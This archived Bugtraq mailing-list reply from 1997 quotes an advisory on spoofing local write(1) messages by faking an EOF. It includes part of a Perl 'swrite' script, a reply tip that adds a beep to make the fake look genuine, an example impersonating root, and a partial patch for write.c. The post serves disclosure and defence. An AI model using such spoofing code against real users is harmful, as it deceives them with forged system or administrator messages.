Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: write(1)

From: jauderho () NETCOM COM (Jauder Ho)
Date: Thu, 22 May 1997 11:20:44 -0700

        to do the beep....

try \cG

print(JIM "\cG\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n");


--Jauder (Perl is your friend!)

On Wed, 21 May 1997, test wrote:


Program Effected: write(1)
Impact: Mostly Harmless

        It is trivial to spoof a write from one user to the next locally
        on a system by faking an "EOF".  This ofcourse does not effect
        users who have turned off their write permissions.  It's also
        fairly noticeable by the lack of any beep.


print(JIM "\nMessage from $ARGV[1]\@$host on $terminal at $time ...\n");
foreach $line (@to_write){
        sleep $delay;
        print (JIM "$line\n");
        }
$| = 0;
close(JIM);
-------------------------------swrite----------------------------------------

        example usage...

        Un*x % echo The System is going down IMMIDIATELY\! | ./swrite \
        user root console


        If your an absolute paranoid, here are the diff's of an incomplete
        patch for write.c.. it's a start anyhow.

281c281,284
<       while (fgets(line, sizeof(line), stdin) != NULL)
---

      while (fgets(line, sizeof(line), stdin) != NULL){
              if(!strcmp(line, "EOF\n")){
                      (void)strcpy(line, "EOF <-- Warning: Not End of File.\n");
              }

282a286

      }



        It'll work for "EOF" just not for "EOF " or "EOF  " etc...




                        .sig under construction
Previous By Date Next
Previous By Thread Next

Current thread: